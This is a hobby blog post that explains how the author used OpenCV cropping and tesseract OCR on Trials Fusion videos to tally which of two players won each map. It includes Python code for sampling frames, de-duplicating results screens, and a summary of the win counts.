<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">In the screenshot above, we have the 720p video (after some testing, I found that 720p was probably the best choice for this) and a frame extracted from it. Since I'm only interested in the area of the frame that contains the map and winner information, I decided to crop that area.</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">This post has more information on how to crop: https://www.pyimagesearch.com/2014/01/20/basic-image-manipulations-in-python-and-opencv-resizing-scaling-rotating-and-cropping/</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">After cropping the frame appears as shown below:</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span id="docs-internal-guid-efc56a08-be25-b40e-cc5b-02d5e1b1f1ed"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-4dd39593-be25-c2fe-f2ae-c869f09bd80c"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="357" src="https://lh5.googleusercontent.com/92hFU3xfAiOGLgaFfRef0fo0_CZtZRRmqDUS1L4Twsb7gMKZdFYkwmhDKUTyvdPe4gX6jHFNgKArhwvDmxKFweuHnr5RQr_xbyzylqb-k6MiIm1YCnoXa6DR-UfA0Fr_bGWsNerK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">After I had the cropping part working correctly, I decided to do OCR with tesseract. OpenCV allows you to convert the frame to grayscale or black and white. I tested OCR with both gray and black and white frames and it did not make too much of a difference in the output from OCR.</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">To have tesseract OCR analyze the frame, the following has to be done:</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">from PIL import Image</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">import tesserocr</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">image = Image.fromarray(frame)  # frame: numpy array from cv2 (use the grayscale frame; OpenCV colour frames are BGR, PIL reads them as RGB)</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">str_out = tesserocr.image_to_text(image)</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Here are some issues with doing OCR that I had while doing this:</span></span><br />
<br />
<ul>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">You'll be extracting information about the current race, such as time, player name, and faults.</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Processing each frame is a bad idea and wastes a lot of resources</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Looking for "wins" and "Player" in the OCR output is a good idea, but you will see them in every frame while that map's results screen is displayed (for example, frame 99 and frame 100 have nearly identical OCR output)</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">If you look for "wins" and "Player" and skip frames, you may end up skipping too much and missing results</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Sometimes the winning player's information is picked up but not the map information</span></span></li>
</ul>
<span style="font-family: Arial, Helvetica, sans-serif;">Here's the process I ended up using for extracting information as accurately as I can:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I process every 50th frame. If the OCR output of the frame contains "wins", I process the OCR data further: check each line of the OCR output, and if the line contains both "wins" and "Player", figure out the player who won. If a line does not contain "wins" and "Player", it is taken to be the map name. Concatenate the map name, player name, and video name into one variable and print it. Another part keeps track of the frame number from which we last successfully extracted the map and player information. Full extraction from an OCR'd frame only happens if the new frame is at least 500 frames after the last successful extraction. This way, 50 frames later we don't re-extract the same map and player information, but since we're still processing every 50th frame, we won't miss the outcome of a map. The process is hard to explain, so definitely look at the code. </span><br />
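<span style="font-family: Arial, Helvetica, sans-serif;">Here is the sampling and de-duplication logic described above, reconstructed as an added example; this is not the TrialsFusionOCR script itself. The OCR step is passed in as a callable, so the selection logic runs offline on constructed "frames" that are already text, and a tesseract adapter for real OpenCV frames is included for use on an actual video. The results-screen layout it parses (one line "Player &lt;name&gt; wins ..." plus a map-name line) and the <code>constructed_frames()</code> video are assumptions.</span><br />

```python
"""Frame-sampling + de-duplication logic from the post, as an added example
(not the TrialsFusionOCR script).  OCR is a callable so the logic runs
offline on constructed text; tesseract_ocr() is the real adapter."""
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple

OCR_EVERY = 50    # OCR only every 50th frame (from the post)
MIN_GAP = 500     # a hit within 500 frames of the last one is the same results screen


@dataclass
class Win:
    video: str
    frame: int
    map_name: str
    winner: str


# Assumed results-screen layout: a line "Player <name> wins ..." plus a map-name line.
WIN_LINE = re.compile(r"Player\s+(\S+)\s+wins")


def parse_win_screen(text: str) -> Optional[Tuple[str, str]]:
    """Return (map_name, winner) if the OCR text looks like a results screen, else None.
    A missing map line (one of the failure modes listed above) yields 'unknown'."""
    if "wins" not in text:
        return None
    map_name, winner = None, None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if "wins" in line and "Player" in line:
            m = WIN_LINE.search(line)
            winner = m.group(1) if m else "unknown"
        elif map_name is None:
            map_name = line          # first other line is taken as the map name
    if winner is None:
        return None
    return (map_name or "unknown", winner)


def extract_wins(video: str, frames: Iterable, ocr: Callable[[object], str]) -> List[Win]:
    """Walk frames in order, OCR every OCR_EVERY-th one, and record a win only
    when it is at least MIN_GAP frames after the previously recorded win."""
    wins: List[Win] = []
    last_hit = -MIN_GAP               # lets the first results screen through
    for idx, frame in enumerate(frames):
        if idx % OCR_EVERY:
            continue
        parsed = parse_win_screen(ocr(frame))
        if parsed is None or idx - last_hit < MIN_GAP:
            continue
        wins.append(Win(video, idx, *parsed))
        last_hit = idx
    return wins


def constructed_frames() -> List[str]:
    """A constructed 2000-frame 'video' where each frame is already its OCR text."""
    hud = "00:12.34\nNFEN 0 faults\nCaptainSparklez 1 fault"
    win1 = "Map Alpha\nPlayer NFEN wins!"
    win2 = "Map Beta\nPlayer CaptainSparklez wins!"
    # results screens shown at frames 1000-1149 and 1600-1699
    return [hud] * 1000 + [win1] * 150 + [hud] * 450 + [win2] * 100 + [hud] * 300


def tesseract_ocr(frame) -> str:
    """Adapter for real OpenCV frames (imports kept local so the rest runs without them)."""
    import cv2                       # pip install opencv-python
    import tesserocr                 # pip install tesserocr
    from PIL import Image
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    return tesserocr.image_to_text(Image.fromarray(gray))


def video_frames(path: str):
    """Yield frames from a video file with OpenCV, in order."""
    import cv2
    cap = cv2.VideoCapture(path)
    try:
        while True:
            ok, frame = cap.read()
            if not ok:
                break
            yield frame
    finally:
        cap.release()


if __name__ == "__main__":
    for w in extract_wins("constructed.mp4", constructed_frames(), ocr=lambda f: f):
        print(w)
    # real file: extract_wins("video.mp4", video_frames("video.mp4"), tesseract_ocr)
```

<span style="font-family: Arial, Helvetica, sans-serif;">On the constructed video the first results screen is OCR'd at frames 1000, 1050 and 1100 but recorded once, and the second is recorded at 1600. The trade-off in the 500-frame gap is visible here too: a map whose results appear less than 500 frames after the previous recorded win would be dropped, so the gap has to stay shorter than the shortest race in the playlist.</span><br />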
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The results:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">165 videos were processed. 670 maps were seen by the script.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NFEN won 291 maps. CaptainSparklez won 371 maps. Mark/YYFakieDualCom (script didn't look for this username) won 8 maps.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Script and the results are posted on Github: https://github.com/BoredHackerBlog/TrialsFusionOCR</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Anyways, this was a fun and interesting side project for me. There are definitely ways to improve this. For example, OCR isn't perfect and tesseract could have been trained to extract better data. Also, the code could probably be optimized or be written in a different language like C++ or Golang to get better performance. </span><br />